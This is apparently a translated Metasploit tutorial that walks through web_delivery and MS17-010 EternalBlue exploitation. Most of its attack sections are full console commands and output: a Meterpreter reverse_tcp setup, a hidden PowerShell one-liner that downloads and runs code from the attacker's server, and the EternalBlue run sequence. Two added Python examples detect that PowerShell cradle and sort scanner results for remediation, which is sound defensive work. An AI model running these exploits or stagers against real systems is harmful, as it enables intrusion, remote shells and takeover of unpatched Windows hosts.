## Introduction to MSF

Metasploit is a free, downloadable framework through which one can easily obtain, develop, and launch attacks against vulnerabilities in computer software. It ships with hundreds of professional-grade exploit modules for known software vulnerabilities.
## Installing Metasploit

This installation method is preferred. After installing, set up PostgreSQL yourself so that the fast `search` can be used to look up vulnerabilities.

```shell
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
./msfinstall
```
## MSF web_delivery

```
msf > use exploit/multi/script/web_delivery
```

- Set which operating system the target runs, so that the matching PHP/Python/PowerShell stager is generated:

```
msf exploit(web_delivery) > set target 2
target => 2
```

- Choose the reverse-connection payload:

```
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
```

- Open the URL on the server that the target will fetch:

```
msf exploit(web_delivery) > set SRVPORT 8081
SRVPORT => 8081
msf exploit(web_delivery) > set URIPATH /
URIPATH => /
msf exploit(web_delivery) > set lhost ip   # public (external) IP address
lhost => ip
```

- Set the IP and port that the reverse shell connects back to:

```
msf exploit(web_delivery) > set lport 6666
lport => 6666
msf exploit(web_delivery) > run
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.2.100:6666
msf exploit(web_delivery) > [*] Using URL: http://0.0.0.0:8081/
[*] Local IP: http://192.168.2.100:8081/
[*] Server started.
```

The generated stager; the one below is PowerShell:

```
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $k=new-object net.webclient;$k.proxy=[Net.WebRequest]::GetSystemWebProxy();$k.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $k.downloadstring('http://<public-ip>:8081/');
```
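The PowerShell one-liner above is exactly the artifact a defender sees in process-creation telemetry (Sysmon Event ID 1, EDR process events). As an added example, not part of the original page and not Metasploit code, the Python below scores command lines for the traits of that download cradle (hidden window, no profile, WebClient download, `IEX`, a remote URL) and raises an alert above a threshold. The event fields, the sample events and the weights are assumptions of this example; the first sample command line is the page's stager with a documentation-range address in place of the public IP.

```python
import re

# Constructed sample process-creation events (hypothetical telemetry, not from the page).
# Event 0 is the web_delivery PowerShell stager shown on the page, with 203.0.113.10
# (a documentation-range address) substituted for the real public IP.
SAMPLE_EVENTS = [
    {"host": "ws01",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": ("powershell.exe -nop -w hidden -c $k=new-object net.webclient;"
                 "$k.proxy=[Net.WebRequest]::GetSystemWebProxy();"
                 "$k.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;"
                 "IEX $k.downloadstring('http://203.0.113.10:8081/');")},
    {"host": "ws02",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
    {"host": "ws03",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c whoami"},
    {"host": "ws04",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -File C:\\tools\\cleanup.ps1"},
]

# (indicator name, regex, weight). Case-insensitive because PowerShell parameters and
# cmdlet names are. The weights are this example's own choice.
INDICATORS = [
    ("hidden_window",     re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    ("no_profile",        re.compile(r"-no(?:p|profile)\b", re.I), 1),
    ("webclient",         re.compile(r"net\.webclient", re.I), 2),
    ("download_method",   re.compile(r"\.download(?:string|data|file)\s*\(", re.I), 2),
    ("invoke_expression", re.compile(r"\b(?:iex|invoke-expression)\b", re.I), 3),
    ("default_creds",     re.compile(r"defaultcredentials", re.I), 1),
    ("remote_url",        re.compile(r"https?://[^\s'\"]+", re.I), 1),
]
ALERT_THRESHOLD = 6  # high enough that a hidden window or -nop alone never alerts
URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)


def score_cmdline(cmdline):
    """Return (score, [matched indicator names]) for one command line."""
    score, matched = 0, []
    for name, pattern, weight in INDICATORS:
        if pattern.search(cmdline):
            score += weight
            matched.append(name)
    return score, matched


def extract_urls(cmdline):
    """Pull the download URLs out of a command line so they can be blocked or hunted."""
    return URL_RE.findall(cmdline)


def triage(events, threshold=ALERT_THRESHOLD):
    """Return alerts for PowerShell processes whose command line scores >= threshold."""
    alerts = []
    for ev in events:
        if not ev["image"].lower().endswith("powershell.exe"):
            continue
        score, matched = score_cmdline(ev["cmdline"])
        if score >= threshold:
            alerts.append({"host": ev["host"], "score": score,
                           "indicators": matched, "urls": extract_urls(ev["cmdline"])})
    return alerts


if __name__ == "__main__":
    for a in triage(SAMPLE_EVENTS):
        print(f"{a['host']}: score={a['score']} urls={a['urls']} indicators={a['indicators']}")
```

On the sample events only ws01 alerts (score 12 with all seven indicators); the legitimate `-NoProfile` script on ws02 and the hidden-window maintenance script on ws04 stay well under the threshold, which is the point of scoring several traits together rather than alerting on `-w hidden` alone.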
## MS17-010 scanning / exploitation

The MS17-010 scanner module can find which machines are vulnerable and which have already been implanted with (infected by) DoublePulsar:

```
[+] 172.20.64.176:445 - Host is likely VULNERABLE to MS17-010! (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[!] 172.20.64.176:445 - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x32752EAF
```

```
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 1.1.1.1-1.1.1.100
set threads 100
run
```
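The two result lines above are what the scanner prints per host, and on a large range the output is easier to act on as a per-host list. As an added example, not from the page and not part of the Metasploit project, the Python below parses that output into one record per host and orders the hosts for remediation, implanted hosts first. The sample output is constructed from the page's two lines plus invented neighbouring hosts (.177 and .180), and the priority labels and actions are this example's own convention.

```python
import re

# Constructed scanner output: the two result lines from the page plus invented
# neighbouring hosts (172.20.64.177 and 172.20.64.180) to give a mixed result set.
SAMPLE_OUTPUT = """\
[+] 172.20.64.176:445 - Host is likely VULNERABLE to MS17-010! (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[!] 172.20.64.176:445 - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x32752EAF
[-] 172.20.64.177:445 - Host does NOT appear vulnerable
[+] 172.20.64.180:445 - Host is likely VULNERABLE to MS17-010! (Windows 7 Professional 7601 Service Pack 1)
[*] Scanned 3 of 3 hosts (100% complete)
"""

IP = r"\d{1,3}(?:\.\d{1,3}){3}"
VULNERABLE_RE = re.compile(
    r"^\[\+\]\s+(?P<host>" + IP + r"):(?P<port>\d+) - Host is likely VULNERABLE to MS17-010!"
    r"(?:\s+\((?P<os>[^)]*)\))?")
INFECTED_RE = re.compile(
    r"^\[!\]\s+(?P<host>" + IP + r"):(?P<port>\d+) - Host is likely INFECTED with DoublePulsar!"
    r"(?:\s+-\s+Arch:\s*(?P<arch>[^,]+),\s*XOR Key:\s*(?P<key>0x[0-9A-Fa-f]+))?")


def _record():
    return {"vulnerable": False, "infected": False, "os": None, "arch": None, "xor_key": None}


def parse_scan(lines):
    """Fold scanner lines into one record per host; hosts with no finding are omitted."""
    results = {}
    for line in lines:
        m = VULNERABLE_RE.match(line)
        if m:
            rec = results.setdefault(m["host"], _record())
            rec["vulnerable"] = True
            rec["os"] = m["os"]
            continue
        m = INFECTED_RE.match(line)
        if m:
            rec = results.setdefault(m["host"], _record())
            rec["infected"] = True
            rec["arch"] = m["arch"].strip() if m["arch"] else None
            rec["xor_key"] = m["key"]
    return results


def remediation_plan(results):
    """Order hosts for response: implanted hosts first (already compromised), then
    merely unpatched ones. Labels and actions are this example's own convention."""
    plan = []
    for host, rec in results.items():
        if rec["infected"]:
            plan.append((host, "P1", "isolate and rebuild: DoublePulsar implant present"))
        elif rec["vulnerable"]:
            plan.append((host, "P2", "apply the MS17-010 update, disable SMBv1, restrict TCP/445"))
    rank = {"P1": 0, "P2": 1}
    # Sort by priority, then numerically by IP so neighbouring hosts stay together.
    plan.sort(key=lambda item: (rank[item[1]], tuple(int(o) for o in item[0].split("."))))
    return plan


if __name__ == "__main__":
    for host, prio, action in remediation_plan(parse_scan(SAMPLE_OUTPUT.splitlines())):
        print(f"{prio} {host}: {action}")
```

The `[-]` and `[*]` lines match neither pattern and are dropped, so a host only appears in the result when the scanner reported something about it; an infected host keeps both its OS string (from the `[+]` line) and its implant details (from the `[!]` line).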
The exploit module can directly return a meterpreter session for us to use; in my own testing so far the success rate against Windows 2003 seems rather low.

```
msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > set rhost 172.20.64.176
msf exploit(ms17_010_eternalblue) > options
msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(ms17_010_eternalblue) > set lhost <local-ip>
msf exploit(ms17_010_eternalblue) > set lport <local-listen-port>
msf exploit(ms17_010_eternalblue) > run -j
```
Output of the `options` command for this module:

```
Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST                                yes       The target address
   RPORT               445              yes       The target port (TCP)
   SMBDomain           .                no        (Optional) The Windows domain to use for authentication
   SMBPass                              no        (Optional) The password for the specified username
   SMBUser                              no        (Optional) The username to authenticate as
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     6666             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs
```
Thanks to 一哥.